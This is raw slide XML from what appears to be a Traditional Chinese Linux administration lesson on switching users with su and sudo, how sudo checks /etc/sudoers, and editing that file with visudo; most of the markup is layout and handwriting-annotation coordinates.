          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700396" y="4792964"/>
            <a:ext cx="1823932" cy="707508"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7902"/>
              <a:gd name="adj2" fmla="val 45238"/>
              <a:gd name="adj3" fmla="val -2571"/>
              <a:gd name="adj4" fmla="val 45833"/>
              <a:gd name="adj5" fmla="val -71491"/>
              <a:gd name="adj6" fmla="val 466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</a:rPr>
              <a:t>Shell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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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4" t="81305" r="34010" b="5568"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="626547" y="1997224"/>
            <a:ext cx="8346325" cy="2419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3244680" y="552600"/>
              <a:ext cx="2534040" cy="954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28840" y="488880"/>
                <a:ext cx="25657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1015920" y="1536840"/>
              <a:ext cx="1568880" cy="64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00080" y="1473120"/>
                <a:ext cx="16005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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="368280" y="5105520"/>
              <a:ext cx="572040" cy="25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2440" y="5041800"/>
                <a:ext cx="6037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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1231920" y="5937120"/>
              <a:ext cx="546480" cy="259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216080" y="5873760"/>
                <a:ext cx="5781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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1835280" y="5130720"/>
              <a:ext cx="781200" cy="640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819440" y="5067360"/>
                <a:ext cx="8128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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2577960" y="6095880"/>
              <a:ext cx="578520" cy="3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562120" y="6032520"/>
                <a:ext cx="6102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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3365640" y="5137200"/>
              <a:ext cx="806760" cy="8280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349800" y="5073480"/>
                <a:ext cx="838440" cy="21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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4413240" y="6051600"/>
              <a:ext cx="908280" cy="255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97400" y="5987880"/>
                <a:ext cx="9399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1" name="筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6216480" y="5226120"/>
              <a:ext cx="768960" cy="1296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200640" y="5162400"/>
                <a:ext cx="8006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2" name="筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-25560" y="0"/>
              <a:ext cx="2407320" cy="21909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-41400" y="-63360"/>
                <a:ext cx="2439000" cy="231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3" name="筆跡 22"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3071880" y="2185920"/>
              <a:ext cx="78840" cy="3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056040" y="2122560"/>
                <a:ext cx="1105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筆跡 23"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6365160" y="2193120"/>
              <a:ext cx="1179000" cy="7164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349320" y="2129400"/>
                <a:ext cx="121068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5" name="筆跡 24"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6300720" y="2193120"/>
              <a:ext cx="1836360" cy="1440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284880" y="2129400"/>
                <a:ext cx="1868040" cy="141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8611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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以進行任何身分的切換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/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty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/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>帳號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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：後面接的是切換使用者帳號名稱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="30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使用者身分切換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4381560" y="698400"/>
              <a:ext cx="186732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65720" y="635040"/>
                <a:ext cx="18990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06400" y="1625760"/>
              <a:ext cx="56556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0560" y="1562040"/>
                <a:ext cx="5972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311720" y="1581120"/>
              <a:ext cx="24134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95880" y="1517760"/>
                <a:ext cx="24451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021840" y="2243160"/>
              <a:ext cx="1379160" cy="144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006000" y="2179440"/>
                <a:ext cx="1410840" cy="141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376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指令用來取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>或是其他帳號的權限。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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> [-b][-u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>新使用者帳號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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：將後續的指令放到背景中讓系統自動執行，而不與目前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>產生影響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u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>後面可以接欲切換的使用者，若無此項則代表切換身分為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>root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 smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>權限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1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870120" y="1574640"/>
              <a:ext cx="1028880" cy="259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3920" y="1511280"/>
                <a:ext cx="10609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013280" y="2774880"/>
              <a:ext cx="36216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97440" y="2711520"/>
                <a:ext cx="3938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368440" y="342720"/>
              <a:ext cx="4280400" cy="2610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52600" y="279360"/>
                <a:ext cx="4312080" cy="38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648320" y="2705040"/>
              <a:ext cx="335304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32480" y="2641680"/>
                <a:ext cx="33847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621960" y="1564560"/>
              <a:ext cx="2007720" cy="500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606120" y="1500840"/>
                <a:ext cx="203940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050120" y="2100240"/>
              <a:ext cx="500400" cy="1216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34280" y="2036520"/>
                <a:ext cx="532080" cy="24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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1343160" y="5029200"/>
              <a:ext cx="27180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327320" y="4965480"/>
                <a:ext cx="3034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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3971880" y="5371920"/>
              <a:ext cx="564840" cy="43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956040" y="5308560"/>
                <a:ext cx="596520" cy="17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88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指令的執行只需要自己的密碼就可以做登入，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>並非所有人員都可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>執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必須將使用者加入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裡。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>不建議使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>一起使用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zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>利用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與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>放在一起使用，藉由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>取得一個新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>不用輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>密碼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zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，也就等同於直接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>帳號的意思，其實不太安全。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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以其他使用者的身分執行指令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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW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1041480" y="1587600"/>
              <a:ext cx="819360" cy="572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25640" y="1523880"/>
                <a:ext cx="85104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168720" y="1600200"/>
              <a:ext cx="578160" cy="51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2880" y="1536840"/>
                <a:ext cx="6098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552920" y="1536840"/>
              <a:ext cx="2711880" cy="763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537080" y="1473120"/>
                <a:ext cx="274356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168720" y="2705040"/>
              <a:ext cx="4368960" cy="828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152880" y="2641680"/>
                <a:ext cx="440064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098880" y="3251160"/>
              <a:ext cx="64800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83040" y="3187800"/>
                <a:ext cx="6796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4489560" y="3263760"/>
              <a:ext cx="92088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473720" y="3200400"/>
                <a:ext cx="9525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803240" y="3727440"/>
              <a:ext cx="3607200" cy="637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787400" y="3664080"/>
                <a:ext cx="36388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292480" y="4832280"/>
              <a:ext cx="4299120" cy="450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276640" y="4768920"/>
                <a:ext cx="43308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4603680" y="1593720"/>
              <a:ext cx="2489760" cy="511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587840" y="1530360"/>
                <a:ext cx="25214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243240" y="2685960"/>
              <a:ext cx="4308120" cy="11448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227400" y="2622600"/>
                <a:ext cx="4339800" cy="241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8154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3400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>預設僅有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>能使用，流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>當使用者執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指令時，系統於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檔案中搜尋該使用者是否有執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的權限。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en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>若使用者可執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的權限後，便讓使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>使用者自己的密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>來確認。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en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>若密碼輸入成功，便開始進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後續接的指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>(root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>執行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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>須輸入密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p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 smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令流程</a:t>
            </a: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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW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907920" y="2419200"/>
              <a:ext cx="1708560" cy="259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2080" y="2355840"/>
                <a:ext cx="17402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705200" y="2470320"/>
              <a:ext cx="28620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89360" y="2406600"/>
                <a:ext cx="3178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5899320" y="2451240"/>
              <a:ext cx="1892520" cy="446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883120" y="2387520"/>
                <a:ext cx="192456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880400" y="2495520"/>
              <a:ext cx="482760" cy="12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864560" y="2432160"/>
                <a:ext cx="5148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04880" y="2971800"/>
              <a:ext cx="2750040" cy="637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89040" y="2908440"/>
                <a:ext cx="278172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558880" y="3809880"/>
              <a:ext cx="3816720" cy="1465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543040" y="3746520"/>
                <a:ext cx="384876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415880" y="4692600"/>
              <a:ext cx="2331000" cy="1782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400040" y="4629240"/>
                <a:ext cx="2362680" cy="30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6248520" y="4813200"/>
              <a:ext cx="1403640" cy="194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232680" y="4749840"/>
                <a:ext cx="1435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892160" y="5340240"/>
              <a:ext cx="84492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876320" y="5276880"/>
                <a:ext cx="876600" cy="133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6535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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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910" y="1295426"/>
            <a:ext cx="6847457" cy="499263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5472000" y="1892880"/>
              <a:ext cx="228960" cy="75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456160" y="1829520"/>
                <a:ext cx="260640" cy="13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862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smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>切換的身份與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>執行者身份相同，也不需要輸入密碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>重點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t> 「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>能否使用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必須看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的設定值，而可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>者是透過輸入使用者自己的密碼來執行後續的指令串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="新細明體"/>
                <a:ea typeface="新細明體"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="34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 smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令流程</a:t>
            </a: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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW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1854360" y="1517760"/>
              <a:ext cx="5391360" cy="255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38160" y="1454040"/>
                <a:ext cx="54234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280360" y="1644480"/>
              <a:ext cx="23544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264520" y="1581120"/>
                <a:ext cx="2671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33480" y="2063880"/>
              <a:ext cx="2152800" cy="637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17640" y="2000160"/>
                <a:ext cx="21848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502000" y="2717640"/>
              <a:ext cx="210204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486160" y="2654280"/>
                <a:ext cx="21337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029200" y="2743200"/>
              <a:ext cx="58464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013360" y="2679840"/>
                <a:ext cx="616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657760" y="2736720"/>
              <a:ext cx="81972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641920" y="2673360"/>
                <a:ext cx="851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685800" y="3193920"/>
              <a:ext cx="2426040" cy="1022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69960" y="3130560"/>
                <a:ext cx="245772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778200" y="3289320"/>
              <a:ext cx="83232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762360" y="3225960"/>
                <a:ext cx="8640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292480" y="3765600"/>
              <a:ext cx="3943440" cy="7668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276640" y="3701880"/>
                <a:ext cx="397512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7182000" y="3835440"/>
              <a:ext cx="489240" cy="194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165800" y="3771720"/>
                <a:ext cx="521280" cy="14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3373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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>記錄在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> /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檔案中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案指明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>哪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>執行哪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>在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檔案中的基本配置格式</a:t>
            </a:r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修改使用者執行權限</a:t>
            </a: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604" y="3615331"/>
            <a:ext cx="8257884" cy="1696023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35496" y="5445224"/>
            <a:ext cx="1708092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sz="2400" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>帳號</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400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1959610" y="5415607"/>
            <a:ext cx="4484598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sz="2400" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>登入者主機名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可切換的身分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122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648437" y="5415607"/>
            <a:ext cx="2100027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sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可下達的指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直線單箭頭接點 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="889542" y="4463342"/>
            <a:ext cx="0" cy="9818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>
            <a:stCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3275856" y="4581128"/>
            <a:ext cx="926053" cy="8344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>
            <a:stCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5580112" y="4581128"/>
            <a:ext cx="2118339" cy="8344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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW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190440" y="5619600"/>
              <a:ext cx="1118160" cy="133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4600" y="5556240"/>
                <a:ext cx="11498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1962000" y="5581800"/>
              <a:ext cx="3937680" cy="1270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46160" y="5518080"/>
                <a:ext cx="396936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6902280" y="5638680"/>
              <a:ext cx="1613520" cy="576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86440" y="5575320"/>
                <a:ext cx="164520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38160" y="330120"/>
              <a:ext cx="1359360" cy="14608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320" y="266760"/>
                <a:ext cx="1391040" cy="1587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4638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visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>vi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>將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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案乎交出來進行修改。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>新新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>進</a:t>
            </a:r>
